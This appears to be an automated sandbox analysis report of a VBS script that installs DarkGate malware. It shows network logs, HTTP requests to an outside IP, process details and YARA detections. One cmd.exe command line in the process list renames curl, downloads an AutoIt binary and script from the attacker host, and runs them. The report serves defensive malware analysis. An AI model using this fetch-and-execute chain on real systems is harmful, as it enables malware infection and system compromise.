                                    Sep 23, 2023 08:02:11.166574001 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.166613102 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.166631937 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.166681051 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.166721106 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.166745901 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.166757107 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.166812897 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.166826963 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.166979074 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.167015076 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.167041063 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.167117119 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.167175055 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.167282104 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.210896969 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.445440054 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.445466995 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.445481062 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.445624113 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.445667028 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.445703983 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.445733070 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.445743084 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.445733070 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.445796967 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.445805073 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.445835114 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.445879936 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.445960045 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446000099 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446021080 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.446038961 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446074963 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446090937 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.446111917 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446149111 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446162939 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.446224928 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446264982 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446278095 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.446335077 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446372032 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446392059 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.446408987 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446444988 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446461916 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.446516037 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446552992 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446583033 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.446589947 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446641922 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.446657896 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446724892 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446773052 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.446793079 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446861029 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.446918964 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.446932077 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447033882 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447069883 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447096109 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.447108030 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447160006 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.447177887 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447213888 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447267056 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.447314978 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447524071 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447585106 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.447586060 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447624922 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447680950 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.447777987 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447818995 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447870970 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.447909117 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447947025 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447983980 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.447997093 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.448020935 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448071003 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.448088884 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448126078 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448160887 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448177099 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.448198080 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448252916 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.448268890 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448306084 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448342085 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448358059 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.448447943 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448506117 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.448492050 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448566914 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448585033 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448616028 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.448657990 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448703051 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448705912 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.448792934 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448841095 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.448884010 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448941946 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.448986053 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.448992014 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449038982 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449052095 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449081898 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.449122906 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449178934 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.449193954 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449265003 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449301004 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449323893 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.449337959 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449388027 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.449405909 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449512005 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449568987 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.449655056 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449748993 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449785948 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449800968 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.449821949 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449857950 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449872017 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.449927092 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449961901 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.449976921 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.450058937 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450109005 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.450149059 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450221062 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450258970 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450275898 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.450295925 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450346947 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.450362921 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450400114 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450434923 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450449944 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.450534105 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450586081 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.450593948 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450632095 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450683117 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.450700045 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450737000 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450773001 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450787067 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.450840950 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450876951 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450896025 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.450949907 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450984955 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.450998068 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.451021910 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451070070 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.451088905 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451313019 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451349974 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451370955 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.451386929 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451438904 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.451455116 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451522112 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451575994 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.451636076 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451673031 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451709032 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451724052 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.451777935 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451813936 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451828957 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.451850891 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451900005 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.451919079 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451955080 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.451991081 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452003956 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.452058077 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452094078 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452115059 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.452158928 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452195883 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452212095 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.452343941 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452402115 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.452445984 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452579021 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452615976 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452636957 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.452651978 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452688932 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452703953 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.452850103 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452904940 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.452931881 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.452970028 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.453005075 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.453020096 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.453094006 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.453130007 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.453149080 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.453571081 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.453609943 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.453629971 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.453645945 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.453696966 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.453713894 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.453783035 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.453818083 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.453834057 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.453882933 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.453918934 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.453933954 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.454080105 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.454116106 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.454133987 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.454171896 CEST23514971594.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:11.454230070 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.461672068 CEST497152351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:11.782855034 CEST23514971594.228.169.143192.168.2.3
                                    • 94.228.169.143:2351
                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.34971394.228.169.1432351C:\Windows\System32\wscript.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 23, 2023 08:02:03.007694960 CEST119OUTPOST /bpzszuqi HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Content-Length: 0
                                    Host: 94.228.169.143:2351
                                    Sep 23, 2023 08:02:03.355653048 CEST119INHTTP/1.1 200 OK
                                    Connection: close
                                    Content-Type: text/html; charset=ISO-8859-1
                                    Content-Length: 233
                                    Date: Sat, 23 Sep 2023 06:02:03 GMT


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.34971494.228.169.1432351C:\Windows\System32\wscript.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 23, 2023 08:02:04.164887905 CEST219OUTGET / HTTP/1.1
                                    Host: 94.228.169.143:2351
                                    Accept: */*
                                    User-Agent: curl
                                    Sep 23, 2023 08:02:04.489535093 CEST220INHTTP/1.1 200 OK
                                    Connection: close
                                    Content-Disposition: attachment; filename="Autoit3.exe"
                                    Content-Type: application/octet-stream
                                    Content-Length: 893608
                                    Date: Sat, 23 Sep 2023 06:02:04 GMT


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.34971594.228.169.1432351C:\Windows\System32\wscript.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 23, 2023 08:02:08.213279963 CEST1148OUTGET /msibpzszuqi HTTP/1.1
                                    Host: 94.228.169.143:2351
                                    User-Agent: curl/7.55.1
                                    Accept: */*
                                    Sep 23, 2023 08:02:08.545937061 CEST1148INHTTP/1.1 200 OK
                                    Connection: close
                                    Content-Disposition: attachment; filename="yxAaBw.au3"
                                    Content-Type: application/octet-stream
                                    Content-Length: 930759
                                    Date: Sat, 23 Sep 2023 06:02:08 GMT


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:1
                                    Start time:08:02:01
                                    Start date:23/09/2023
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs"
                                    Imagebase:0x7ff734150000
                                    File size:163'840 bytes
                                    MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:08:02:02
                                    Start date:23/09/2023
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3
                                    Imagebase:0x7ff7c84f0000
                                    File size:273'920 bytes
                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:08:02:02
                                    Start date:23/09/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff766460000
                                    File size:625'664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:4
                                    Start time:08:02:02
                                    Start date:23/09/2023
                                    Path:C:\bpzs\bpzs.exe
                                    Wow64 process (32bit):false
                                    Commandline:bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351
                                    Imagebase:0x7ff7f8d00000
                                    File size:424'448 bytes
                                    MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    • Detection: 0%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:true

                                    Target ID:5
                                    Start time:08:02:06
                                    Start date:23/09/2023
                                    Path:C:\bpzs\bpzs.exe
                                    Wow64 process (32bit):false
                                    Commandline:bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi
                                    Imagebase:0x7ff7f8d00000
                                    File size:424'448 bytes
                                    MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:6
                                    Start time:08:02:10
                                    Start date:23/09/2023
                                    Path:C:\bpzs\Autoit3.exe
                                    Wow64 process (32bit):true
                                    Commandline:Autoit3.exe szkzjr.au3
                                    Imagebase:0x2b0000
                                    File size:893'608 bytes
                                    MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:Borland Delphi
                                    Yara matches:
                                    • Rule: JoeSecurity_DarkGate_1, Description: Yara detected DarkGate, Source: 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DarkGate_1, Description: Yara detected DarkGate, Source: 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DarkGate_1, Description: Yara detected DarkGate, Source: 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    • Detection: 3%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:6.7%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:30.7%
                                      Total number of Nodes:1692
                                      Total number of Limit Nodes:30
                                      execution_graph 29385 7ff7f8d26df8 8 API calls 29386 7ff7f8d2cd96 47 API calls _cwprintf_s_l 29388 7ff7f8d3ca00 156 API calls 29389 7ff7f8d0fe0a 23 API calls 29392 7ff7f8d27fd8 20 API calls 29395 7ff7f8d2cd96 49 API calls _cwprintf_s_l 29396 7ff7f8d07810 22 API calls 27684 7ff7f8d14fde 27685 7ff7f8d1500c 27684->27685 27687 7ff7f8d150c3 27685->27687 27702 7ff7f8d268c0 24 API calls 27685->27702 27688 7ff7f8d139c4 131 API calls 27687->27688 27692 7ff7f8d15121 27687->27692 27688->27692 27689 7ff7f8d16208 20 API calls 27689->27692 27690 7ff7f8d1645c 20 API calls 27690->27692 27691 7ff7f8d1517b 27693 7ff7f8d151cc 27691->27693 27694 7ff7f8d15184 free 27691->27694 27692->27689 27692->27690 27692->27691 27692->27693 27695 7ff7f8d151e8 free 27692->27695 27696 7ff7f8d139c4 131 API calls 27692->27696 27698 7ff7f8d1521f 27692->27698 27703 7ff7f8d265d8 31 API calls _cwprintf_s_l 27694->27703 27695->27692 27696->27692 27698->27692 27700 7ff7f8d151ba 27698->27700 27704 7ff7f8d265d8 31 API calls _cwprintf_s_l 27698->27704 27700->27693 27702->27687 27703->27700 27704->27698 29397 7ff7f8d0bde0 strtoll _errno 29401 7ff7f8d0bbe8 _errno strtod _errno 28610 7ff7f8d25bf5 28611 7ff7f8d25c01 28610->28611 28612 7ff7f8d25c39 28611->28612 28616 7ff7f8d18990 28611->28616 28640 7ff7f8d167ac 23 API calls 2 library calls 28612->28640 28615 7ff7f8d25c4f 28617 7ff7f8d189ec 28616->28617 28618 7ff7f8d18a1b 28616->28618 28617->28618 28620 7ff7f8d189f6 28617->28620 28628 7ff7f8d18a2d 28618->28628 28641 7ff7f8d23bb8 GetTickCount64 28618->28641 28621 7ff7f8d18a0c Sleep 28620->28621 28622 7ff7f8d189fc WSASetLastError 28620->28622 28639 7ff7f8d18a14 28620->28639 28621->28639 28622->28639 28623 7ff7f8d48290 _cwprintf_s_l 8 API calls 28624 7ff7f8d18d33 28623->28624 28624->28612 28625 7ff7f8d18bba select 28626 7ff7f8d18c6e 28625->28626 28627 7ff7f8d18bf2 WSAGetLastError 28625->28627 28629 7ff7f8d18cb9 28626->28629 28630 7ff7f8d18c8d __WSAFDIsSet __WSAFDIsSet 28626->28630 28626->28639 28627->28628 28628->28625 28628->28626 28628->28639 28642 7ff7f8d23bb8 GetTickCount64 28628->28642 28632 7ff7f8d18ceb 28629->28632 28633 7ff7f8d18cc2 __WSAFDIsSet 28629->28633 28630->28629 28636 7ff7f8d18cf4 __WSAFDIsSet 28632->28636 28632->28639 28634 7ff7f8d18cd7 __WSAFDIsSet 28633->28634 28635 7ff7f8d18cd4 28633->28635 28634->28632 28635->28634 28637 7ff7f8d18d08 28636->28637 28638 7ff7f8d18d0b __WSAFDIsSet 28636->28638 28637->28638 28638->28639 28639->28623 28640->28615 28641->28628 28642->28628 29404 7ff7f8d2cd96 48 API calls _cwprintf_s_l 29405 7ff7f8d01bb0 _lseeki64 29406 7ff7f8d0cbc0 132 API calls 29408 7ff7f8d373c0 108 API calls _cwprintf_s_l 28585 7ff7f8d101d0 getenv 28586 7ff7f8d101fc ExpandEnvironmentStringsA 28585->28586 28587 7ff7f8d10216 28585->28587 28586->28587 28588 7ff7f8d48290 _cwprintf_s_l 8 API calls 28587->28588 28589 7ff7f8d10243 28588->28589 29412 7ff7f8d329d0 105 API calls 29413 7ff7f8d2fbd0 74 API calls _cwprintf_s_l 29414 7ff7f8d337d0 138 API calls _cwprintf_s_l 29415 7ff7f8d487d0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter __security_init_cookie 29418 7ff7f8d2f9a0 59 API calls _cwprintf_s_l 29419 7ff7f8d297a5 isspace malloc _cwprintf_s_l strchr 29422 7ff7f8d015c0 37 API calls 29423 